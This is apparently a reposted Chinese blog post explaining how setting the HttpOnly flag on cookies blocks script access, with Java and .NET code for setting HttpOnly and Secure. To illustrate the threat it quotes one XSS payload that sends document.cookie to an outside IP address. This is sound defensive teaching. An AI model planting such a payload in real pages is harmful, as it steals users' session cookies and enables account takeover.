使用HttpOnly提升Cookie安全性

时间：2017-01-14 15:38:43 阅读：238 评论：0 收藏：0 [点我收藏+]

浏览器可以通过js获取到cookie，拿个这个cookie，就相当于拿到了访问的服务器的权限了。黑客如下的xss攻击：

<script>window.open(‘http://10.65.21.78:8080/ck.php?c=‘+document.cookie)</script>

在防止此类问题，可以不允许浏览器拿到cookie，那么我们可以在我们不希望浏览器得到的cookie上Set-Cookie的时候就要把HttpOnly设置true，这样浏览器就拿不到cookie信息。

在java中可以通过response.addHeader("Set-Cookie","userName=junshan; Version=1;Domain=xulingbo.net;Expires=1000;Secure;HttpOnly"),形式设置。

或者：

 Cookie cookie = new Cookie("test","hello");
        cookie.setHttpOnly(true);
        cookie.setSecure(true);
        response.addCookie(cookie);

在.Net 中可以通过

   if (cookie == null)
            {
                cookie = new HttpCookie(strName);
            }
            cookie.HttpOnly = true;
            cookie.Secure = true;
            cookie.Value = UrlHelper.UrlEncode(strValue);
            HttpContext.Current.Response.AppendCookie(cookie);

引用：

http://blog.csdn.net/zzzmmmkkk/article/details/10862949

使用HttpOnly提升Cookie安全性

原文：http://www.cnblogs.com/nele/p/6285343.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)